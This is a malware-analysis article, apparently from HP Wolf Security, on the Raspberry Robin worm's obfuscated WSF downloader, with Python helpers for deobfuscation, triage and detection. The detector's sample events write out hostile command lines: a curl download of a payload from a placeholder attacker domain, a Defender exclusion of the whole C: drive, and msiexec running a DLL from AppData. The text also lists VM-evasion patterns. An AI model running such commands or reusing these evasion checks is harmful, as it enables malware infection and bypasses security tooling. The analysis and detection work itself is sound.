Raspberry Robin Now Spreading Through Windows Script Files | HP Wolf Security (2024)

First identified in late 2021, Raspberry Robin is a Windows worm initially seen targeting technology and manufacturing organizations. It has since grown to become one of the most prevalent threats facing enterprises. In March, the HP Threat Research team identified a change in the way cybercriminals are spreading Raspberry Robin. The malware is now being delivered through Windows Script Files (WSF). The scripts are highly obfuscated and use a range of anti-analysis techniques, enabling the malware to evade detection. Historically, Raspberry Robin was known to spread through removable media like USB drives, but its distributors have also experimented with other initial infection file types. In this article, we’ll share the background on Raspberry Robin, document the new infection method and how to analyze the downloader script.

What is Raspberry Robin?

Raspberry Robin is known for its heavy obfuscation and anti-analysis techniques to bypass detection, fool sandboxes, and slow down security teams seeking to understand the malware. Following infection, the malware communicates with its command and control (C2) servers over Tor. Raspberry Robin is capable of downloading and executing additional payloads, acting as a foothold for threat actors to deliver other malicious files. The malware has been used to deliver families including SocGholish, Cobalt Strike, IcedID, BumbleBee and Truebot, as well as being a precursor of ransomware.

Initial Infection Evolution

Since 2021, threat actors spreading Raspberry Robin have used different methods to infect endpoints:

  • USB devices containing malicious Windows Shortcut Files (.lnk). The shortcut files run Windows Installer commands using msiexec.exe (T1218.007) that download the payload from compromised QNAP network-attached storage (T1584.004) devices.
  • Archive files (RAR) hosted on Discord (T1102). Each RAR file contains an EXE and a DLL file. The EXE is a legitimate signed binary and uses DLL side-loading (T1574.002) to load and run the malicious payload DLL.
  • 7-Zip (.7z) archive files downloaded using the victim’s web browser. Each archive contains a malicious Windows Installer (.msi) package (T1218.007) that infects the PC with Raspberry Robin.
  • Malicious adverts (T1583.008), that when clicked on, download malicious ZIP files hosted on Discord (T1102) that lead to Raspberry Robin.

Raspberry Robin’s Latest Infection Method: Windows Script Files

Raspberry Robin has long been known to spread as a USB worm. At the beginning of this year, cybercriminals spread the malware through archive files via web downloads. In campaigns since early March 2024, however, its distributors swapped archive files for Windows Script Files (.wsf). These files are widely used by administrators and legitimate software to automate tasks within Windows but can also be abused by attackers (T1059). The WSF file format supports scripting languages, such as JScript and VBScript, that are interpreted by the Windows Script Host component built into the Windows operating system.

The Windows Script Files are offered for download via various malicious domains and subdomains controlled by the attackers. It’s not clear how threat actors are luring users to the malicious URLs. However, this could be via spam or malvertising campaigns.

The script file acts as a downloader. Like the Raspberry Robin DLL, the script uses a variety of anti-analysis and virtual machine (VM) detection techniques. The final payload is only downloaded and executed when all these evaluation steps indicate that the malware is running on a real end user device, rather than in a sandbox. The scripts are highly obfuscated. At the time of analysis, they were not classified as malicious by any anti-virus scanners on VirusTotal (Figure 1), demonstrating the evasiveness of the malware.

Figure 1 – Raspberry Robin WSF downloader with a 0% detection rate on VirusTotal.

Technical Analysis of the WSF Downloader

If the Windows script file is opened in a text editor, most of the characters are unreadable. These junk characters serve as a distraction to hide the actual script, and potentially convince anyone inspecting the file that it is not a script file at all.

Figure 2 – Junk characters in Raspberry Robin WSF downloader.

Further down in the file, there are script tags that mark the start of the actual script. Similarly, at the end of the file there is a closing script tag followed by more junk characters.

Figure 3 – Opening script tag.

The start of the actual script can be found a few lines further down. This begins with a variable declaration. An array is used repeatedly throughout the script to decode individual program steps.

Figure 4 – Array that is used to decode the program.

The script is heavily obfuscated and does not immediately reveal its functionality. All functions and variables used are encoded and decoded via a function using the array shown in Figure 4 at runtime. Moreover, the control flow of the program is also obfuscated. In this case, the attacker uses a while loop with a switch case statement contained in it. The flow of the program is defined by a dynamically calculated array of integers.

Figure 5 – Example of control flow using while loop with switch case statements.

We found that each switch case statement contains only a few relevant code sequences. Usually, two such sequences are used for iterating through an enumerator of objects and a third sequence for evaluating it.
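The dispatcher pattern described above (a while loop around a switch whose case order is driven by an array) is a form of control-flow flattening. The following Python helper, added here as an example and not taken from the analyzed script or from HP's tooling, shows how an analyst can replay a dispatcher order to recover the linear statement sequence. The JScript sample inside it is constructed and benign; the real script computes its order array at runtime, so in practice that expression is evaluated first and the resulting literal is substituted before the static pass runs (the helper raises if no literal order is found).

```python
import re

# Constructed sample (not from the analyzed WSF): a flattened dispatcher in the
# style described above, with a literal order array so it can be read statically.
FLATTENED_SAMPLE = r'''
var order = "3|0|2|1".split("|"), i = 0;
while (true) {
  switch (order[i++]) {
    case "0":
      var shell = new ActiveXObject("WScript.Shell");
      continue;
    case "1":
      WScript.Echo(appData);
      continue;
    case "2":
      var appData = shell.ExpandEnvironmentStrings("%APPDATA%");
      continue;
    case "3":
      var marker = 0;
      continue;
  }
  break;
}
'''

# Matches an order array written as a literal "a|b|c".split("|") expression.
ORDER_RE = re.compile(r'"((?:\d+\|)*\d+)"\.split\("\|"\)')
# Matches one case label and the statements up to its trailing continue;
CASE_RE = re.compile(r'case\s+"(\d+)":\s*(.*?)\s*continue;', re.S)


def extract_order(src):
    """Return the dispatcher order as a list of case labels, e.g. ['3', '0', '2', '1']."""
    m = ORDER_RE.search(src)
    if not m:
        raise ValueError("no literal order array found; evaluate it dynamically first")
    return m.group(1).split("|")


def extract_cases(src):
    """Map each case label to the (whitespace-normalized) statements it contains."""
    return {m.group(1): " ".join(m.group(2).split()) for m in CASE_RE.finditer(src)}


def unflatten(src):
    """Replay the dispatcher order to recover the linear statement sequence."""
    cases = extract_cases(src)
    linear = []
    for label in extract_order(src):
        if label not in cases:
            raise ValueError(f"order references unknown case {label!r}")
        linear.append(cases[label])
    return linear


if __name__ == "__main__":
    print("\n".join(unflatten(FLATTENED_SAMPLE)))
```

Once the statements are in execution order, the decoding function and the array from Figure 4 can be applied to the encoded names, and the unused cases that the order never references can be dropped.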

Initially, the malware creates a WScript shell object that allows it to interact with the operating system and is used again and again as the script progresses.

Figure 6 – Creation of WScript shell object.

The first anti-analysis technique checks whether the script is located on the user’s Desktop. If this is the case, the script terminates.

Figure 7 – Check file is saved on Desktop.

If the script continues to run, a SWbemLocator object is created. This object gives the script access to Windows Management Instrumentation (WMI), which can be used to query a wide range of system information.

Figure 8 – Creation of SWbemLocator object.

Figure 9 – Connect to WMI namespace using ConnectServer method.

The script uses this object to perform the following checks and terminates if any of them is true:

1. The script checks whether the build number of the operating system is lower than 17063. Windows 10 build 17063 was an Insider Preview build released in December 2017.

Figure 10 – Check OS build number.

2. Next, the script checks if the processor matches patterns indicating that it is running inside a virtual machine or on a server, rather than on an end user device. (/xEoN|bROAd|qEmu|kVM|EPyC/i)

Figure 11 – Check processor vendor and type.

3. If the video controller corresponds to the pattern “/vmBUs|040515ad|11001aF4/i”, this indicates that the infected client is virtualized. The Raspberry Robin script checks for Hyper-V, VMWare and VirtualBox.

Figure 12 – Check video controller.

4. The script checks the temperature of the CPU by using WMI to access the “Win32_PerfFormattedData_Counters_ThermalZoneInformation” class. Since the temperature will be greater than 0 on non-virtualized devices, this is a simple check to see if the system is virtualized.

Figure 13 – CPU temperature check.

5. The script also uses the classic method for identifying if the runtime environment is virtualized by checking the MAC address of the network card. The script tries to detect the following virtualization solutions:

  • Hyper-V
  • KVM
  • Parallels, Inc.
  • Oracle Virtual Iron
  • Oracle VM Server
  • QEMU
  • VMWare
  • VirtualBox
  • Virtual PC
  • Xen

Figure 14 – Check network card vendor against certain patterns.

6. As the last WMI check, the running processes are listed and compared against a list of known anti-virus processes. The malware checks for the following security software vendors:

  • Kaspersky
  • ESET
  • Avast
  • Avira
  • Check Point
  • Bitdefender

Figure 15 – Check for certain anti-virus processes.
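The checks above leave static fingerprints in the script text (the SWbemLocator and ConnectServer calls, the processor and video controller regular expressions, the ThermalZoneInformation class name, and the while/switch dispatcher). The following Python triage function is an added example, not code from HP Threat Research, that searches for those strings inside the script blocks of a WSF file while coping with the junk bytes that surround them. The sample WSF it scans is constructed; the indicator names and the "three or more hits" threshold are this example's own choices.

```python
import re

# Constructed sample WSF (not the real downloader): junk bytes around a small
# JScript block that references the same WMI-based checks described above.
SAMPLE_WSF = (
    b"\x8f\xa3\x00\xff\xfe junk junk \x81\x92\xe4" * 8
    + b"<job><script language=\"JScript\">\n"
    b"var sh = new ActiveXObject(\"WScript.Shell\");\n"
    b"var loc = new ActiveXObject(\"WbemScripting.SWbemLocator\");\n"
    b"var svc = loc.ConnectServer(\".\", \"root\\\\cimv2\");\n"
    b"var cpuCheck = /xEoN|bROAd|qEmu|kVM|EPyC/i;\n"
    b"var tzClass = \"Win32_PerfFormattedData_Counters_ThermalZoneInformation\";\n"
    b"var order = \"1|0\".split(\"|\"), i = 0;\n"
    b"while (true) { switch (order[i++]) {\n"
    b"  case \"0\": continue;\n"
    b"  case \"1\": continue;\n"
    b"} break; }\n"
    b"</script></job>"
    + b"\x93\x01\x7f\xc4 more junk \x00\x00" * 8
)

SCRIPT_BLOCK_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

# Indicator names are this example's own labels; the patterns come from the analysis above.
INDICATORS = {
    "wmi_locator": re.compile(r"SWbemLocator", re.I),
    "wmi_connect": re.compile(r"\.ConnectServer\s*\(", re.I),
    "cpu_vm_regex": re.compile(r"xEoN\|bROAd\|qEmu\|kVM\|EPyC", re.I),
    "video_vm_regex": re.compile(r"vmBUs\|040515ad\|11001aF4", re.I),
    "thermal_zone_query": re.compile(r"Win32_PerfFormattedData_Counters_ThermalZoneInformation", re.I),
    "switch_dispatcher": re.compile(r"while\s*\([^)]*\)\s*\{\s*switch\s*\(", re.I),
    "wscript_shell": re.compile(r"WScript\.Shell", re.I),
}


def junk_ratio(blob: bytes) -> float:
    """Fraction of bytes that are neither printable ASCII nor ordinary whitespace."""
    if not blob:
        return 0.0
    junk = sum(1 for b in blob if not (32 <= b < 127 or b in (9, 10, 13)))
    return junk / len(blob)


def extract_scripts(blob: bytes) -> list:
    """Return the text of every <script>...</script> block in the file."""
    # latin-1 maps every byte to exactly one code point, so junk bytes never
    # raise a decode error and the script tags are still found.
    text = blob.decode("latin-1")
    return [m.group(1) for m in SCRIPT_BLOCK_RE.finditer(text)]


def triage(blob: bytes) -> dict:
    """Summarize script blocks, matched indicators and junk density for a WSF file."""
    scripts = extract_scripts(blob)
    hits = sorted({name for s in scripts for name, rx in INDICATORS.items() if rx.search(s)})
    return {
        "script_blocks": len(scripts),
        "indicators": hits,
        "junk_ratio": round(junk_ratio(blob), 2),
        "suspicious": len(hits) >= 3,  # threshold chosen for this example
    }


if __name__ == "__main__":
    print(triage(SAMPLE_WSF))
```

A high junk ratio combined with a script block that references WMI hardware queries is a strong triage signal on its own; a scanner like this is useful for sweeping downloaded .wsf files before they reach a user, or for clustering samples that share the same regex literals.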

After these steps, the VM detection of the script is complete. However, in addition to ensuring that the malware runs on a real victim device, the script also implements measures to prevent it from being analyzed. The obfuscation makes analyzing the script somewhat more difficult and time-consuming.

Since there is a large amount of unused code in the script, one strategy to speed up analysis is to identify which code is actually used and remove the unused parts. This makes the script clearer and allows the analyst to focus on the important code sequences. Knowing this, the script’s authors placed an inconspicuous variable assignment in the middle of the unused code. Accidentally removing the variable assignment, which sets the variable to 0, causes the script to terminate: an if statement checks the variable, and if the assignment has been removed the check makes the script stop.

Figure 16 – Check for a variable hidden among unused code.

Care must therefore be taken when refactoring and analyzing the script to ensure that it will still run afterwards. However, caution is also required with dynamic analysis because the malware restarts the script in the code sequence shown in Figure 17 with two command line arguments. If the script is analyzed in a debugger, the malware “breaks out” using this method, since a new process is started.

Figure 17 – Code sequence that restarts the script with command line arguments.

When restarted, the script recognizes the arguments it was given and continues to run. Next, a command deletes the script from the disk (Figure 18). At this point, the running code can therefore only be found in memory. It is important to have a backup copy of the script or to interrupt the delete command before it is executed.

Figure 18 – Deletion of the script from hard disk.

In a previous step, the script checks for processes associated with six anti-virus vendors and stops running if they are found. Given this, the script is more likely to be running on an endpoint protected by Microsoft Defender. To evade detection, the script adds an exception to Microsoft Defender that excludes the entire main drive from anti-virus scanning.

Figure 19 – Add exclusion to Microsoft Defender.

All these checks give the threat actors assurance that the malware is running on a real end user device. Additionally, the Defender exception significantly reduces the likelihood of the subsequent malware stages being detected. The script now downloads the Raspberry Robin DLL from the web using the curl command and stores it in the local AppData folder.

Figure 20 – Command that downloads Raspberry Robin DLL to AppData folder.

The web server does not identify the request by the URL path, as is usually the case, but through a cookie. This enables the web server to verify that the request originates from the downloader script. This way, the malware’s operators reduce the leakage of samples to researchers seeking to analyze Raspberry Robin.

Figure 21 – Command that runs the Raspberry Robin DLL.

Finally, the file’s extension is changed to “.dll” and run using msiexec. This starts the Raspberry Robin malware, which runs through additional sequences of anti-analysis and VM detection techniques until the effective payload is finally executed.
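The behaviours described from Figure 17 onward (the script host restarting itself, a Defender exclusion being added, curl writing to AppData, and msiexec loading a file from AppData) are all visible in process-creation telemetry. The following Python detector is an added example, not HP's published detection content, that runs simple parent/child rules over constructed process events with Sysmon event 1 style fields. It assumes the exclusion is added through the Add-MpPreference or Set-MpPreference cmdlet, which the article does not state; the domain, user name and file names in the sample events are placeholders.

```python
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
APPDATA_RE = re.compile(r"\\AppData\\", re.I)
# Assumption for this example: the exclusion is added via a Defender cmdlet.
EXCLUSION_RE = re.compile(r"(Add|Set)-MpPreference\b.*-Exclusion(Path|Process|Extension)", re.I)

# Constructed process-creation events (Sysmon event 1 style fields); they are
# not telemetry from the campaign. Paths, user and domain are placeholders.
SAMPLE_EVENTS = [
    {"ParentImage": "C:\\Windows\\System32\\wscript.exe",
     "Image": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": "wscript.exe C:\\Users\\alice\\Downloads\\document.wsf ARG1 ARG2"},
    {"ParentImage": "C:\\Windows\\System32\\wscript.exe",
     "Image": "C:\\Windows\\System32\\curl.exe",
     "CommandLine": "curl.exe -b \"session=PLACEHOLDER\" -o C:\\Users\\alice\\AppData\\Local\\Temp\\update.tmp "
                    "https://malicious-domain.example/"},
    {"ParentImage": "C:\\Windows\\System32\\wscript.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -Command Add-MpPreference -ExclusionPath C:\\"},
    {"ParentImage": "C:\\Windows\\System32\\wscript.exe",
     "Image": "C:\\Windows\\System32\\msiexec.exe",
     "CommandLine": "msiexec.exe C:\\Users\\alice\\AppData\\Local\\Temp\\update.dll"},
    # Benign: a user downloading a file from Explorer, and the installer service itself.
    {"ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\curl.exe",
     "CommandLine": "curl.exe -o C:\\Users\\alice\\Downloads\\tool.zip https://example.com/tool.zip"},
    {"ParentImage": "C:\\Windows\\System32\\services.exe",
     "Image": "C:\\Windows\\System32\\msiexec.exe",
     "CommandLine": "msiexec.exe /V"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: dict):
    """Return a rule name for a suspicious event, or None. All rules require a script-host parent."""
    parent, image, cmd = basename(ev["ParentImage"]), basename(ev["Image"]), ev["CommandLine"]
    if parent not in SCRIPT_HOSTS:
        return None
    if image in SCRIPT_HOSTS:
        return "script_host_respawn"                      # Figure 17: script restarts itself
    if image == "curl.exe" and APPDATA_RE.search(cmd):
        return "script_host_curl_to_appdata"              # Figure 20: payload download
    if image in {"powershell.exe", "pwsh.exe"} and EXCLUSION_RE.search(cmd):
        return "defender_exclusion_from_script"           # Figure 19: exclusion added
    if image == "msiexec.exe" and APPDATA_RE.search(cmd):
        return "script_host_msiexec_from_appdata"         # Figure 21: DLL run via msiexec
    return None


def detect(events: list) -> list:
    """Return (index, rule) pairs for every event that matches a rule."""
    return [(i, rule) for i, ev in enumerate(events) for rule in [classify(ev)] if rule]


def chain_complete(events: list) -> bool:
    """True when download, exclusion and execution stages are all present."""
    rules = {rule for _, rule in detect(events)}
    return {"script_host_curl_to_appdata",
            "defender_exclusion_from_script",
            "script_host_msiexec_from_appdata"} <= rules


if __name__ == "__main__":
    for index, rule in detect(SAMPLE_EVENTS):
        print(index, rule, SAMPLE_EVENTS[index]["CommandLine"])
    print("full chain observed:", chain_complete(SAMPLE_EVENTS))
```

Regardless of how the exclusion is created, Microsoft Defender records configuration changes in its Operational event log as event ID 5007, so alerting on that event when the new exclusion path is a drive root gives a second, script-independent signal for the stage shown in Figure 19.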

Conclusion

This recent activity represents the latest in a series of shifts in the way Raspberry Robin is distributed. Although best known for spreading through USB drives, threat actors deploying Raspberry Robin have been using different infection vectors such as web downloads to achieve their objectives. The WSF downloader is heavily obfuscated and uses a large range of anti-analysis and anti-VM techniques, enabling the malware to evade detection and slow down analysis. This is particularly concerning given that Raspberry Robin has been used as a precursor for human-operated ransomware. Countering this malware early on in its infection chain should be a high priority for security teams.

Indicators of Compromise

We have published the following artifacts on the HP Threat Research GitHub to help the security community detect and mitigate this threat:
